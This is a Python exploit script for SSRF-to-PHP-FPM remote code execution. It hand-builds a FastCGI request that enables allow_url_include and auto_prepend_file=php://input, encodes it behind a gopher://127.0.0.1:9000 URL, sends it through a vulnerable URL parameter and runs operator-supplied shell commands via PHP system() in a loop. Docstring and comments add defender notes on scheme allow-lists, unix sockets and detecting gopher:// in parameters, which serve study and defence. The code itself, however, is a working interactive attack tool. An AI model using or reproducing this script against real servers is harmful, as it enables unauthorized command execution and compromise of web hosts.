import urllib.parse
import requests
def main():
    """Build a gopher:// FastCGI request and submit it through a URL parameter.

    Prompts on stdin for a target URL, the HTTP method, the parameter name, a
    script path (default ``/var/www/html/index.php``) and then, in a loop, a
    command.  Each command is wrapped in a PHP snippet, embedded in a FastCGI
    request whose PHP_VALUE sets ``allow_url_include = On`` and
    ``auto_prepend_file = php://input``, percent-encoded behind
    ``gopher://127.0.0.1:9000/_`` and sent to ``url`` in ``parameter`` via
    ``requests``.  Responses are printed as-is; the function returns ``None``.

    Defender's note: this is the SSRF-to-PHP-FPM chain.  It relies on two
    conditions: the application behind ``url`` fetches caller-supplied URLs
    with a client that honours the ``gopher://`` scheme, and PHP-FPM listens
    on loopback TCP port 9000 on that host.  Breaking either one stops it:
    restrict the fetcher's URL schemes to http(s) with an allow-list, and
    serve PHP-FPM over a unix socket or on an address that SSRF-capable
    services cannot reach.  Detection: ``gopher://`` in request parameters
    at the web tier, and FastCGI requests carrying ``PHP_VALUE`` /
    ``auto_prepend_file`` that did not originate from the web server's own
    FastCGI client.
    """
    url = input("url: ").strip()
    post_or_get = input("POST or GET: ").lower().strip() or "get"
    parameter = input("parameter name: ").strip()
    filename = input("filename: ").strip() or "/var/www/html/index.php"
    if not (filename and url):
        # print() returns None, so this both reports and returns None.
        return print("filename and url required")
    while True:
        command = input("command: ")
        # Byte count of the PHP snippet assembled in `end` below: the command
        # plus its fixed 52-character wrapper, encoded as a single character.
        length = len(command) + 52
        char = chr(length)
        # FastCGI parameter block: fixed server params, CONTENT_LENGTH,
        # REQUEST_METHOD, a PHP_VALUE block, SCRIPT_FILENAME set to `filename`,
        # and DOCUMENT_ROOT.  PHP-FPM accepts PHP_VALUE from any FastCGI client
        # that can reach its socket, which is why that socket must never be
        # reachable from an SSRF-capable service.
        data = (
            "\x0f\x10SERVER_SOFTWAREgo / fcgiclient \x0b\tREMOTE_ADDR127.0.0.1\x0f\x08SERVER_PROTOCOLHTTP/1.1\x0e"
            + chr(len(str(length)))
        )
        data += (
            "CONTENT_LENGTH"
            + str(length)
            + "\x0e\x04REQUEST_METHODPOST\tKPHP_VALUEallow_url_include = On\n"
        )
        data += (
            "disable_functions = \nauto_prepend_file = php://input\x0f"
            + chr(len(filename))
            + "SCRIPT_FILENAME"
            + filename
            + "\r\x01DOCUMENT_ROOT/"
        )
        # len(data) split into its high byte, low byte and remainder mod 8.
        temp1 = chr(len(data) // 256)
        temp2 = chr(len(data) % 256)
        temp3 = chr(len(data) % 8)
        # len(data) % 8 NUL bytes, then the trailing records that carry the
        # PHP snippet (length field `char`) as the request body.
        end = (
            str("\x00" * (len(data) % 8))
            + "\x01\x04\x00\x01\x00\x00\x00\x00\x01\x05\x00\x01\x00"
            + char
            + "\x04\x00"
        )
        end += (
            "<?php system('"
            + command
            + "');die('-----Made-by-SpyD3r-----\n');?>\x00\x00\x00\x00"
        )
        # Leading records, carrying the parameter-block length bytes above.
        start = (
            "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x04\x00\x01"
            + temp1
            + temp2
            + temp3
            + "\x00"
        )
        payload = start + data + end

        def get_payload(payload):
            """Percent-encode `payload` behind a hard-coded loopback gopher URL.

            The quote() output has "+" rewritten to "%20" and "%2F" restored
            to "/"; the host and port are fixed at 127.0.0.1:9000.
            """
            finalpayload = (
                urllib.parse.quote(payload).replace("+", "%20").replace("%2F", "/")
            )
            return "gopher://127.0.0.1:9000/_" + finalpayload

        # Delivery: the request goes to the application at `url`; presumably
        # that application's own URL fetcher is what opens the gopher URL.
        # That second hop is the SSRF step a defender can block (scheme
        # allow-list on the fetcher) and log (gopher:// in parameters).
        if post_or_get == "post":
            print(requests.post(url, data={parameter: get_payload(payload)}).text)
        else:
            print(requests.get(url, params={parameter: get_payload(payload)}).text)
if __name__ == "__main__":
    # Script entry point; all input is taken from the stdin prompts in main().
    main()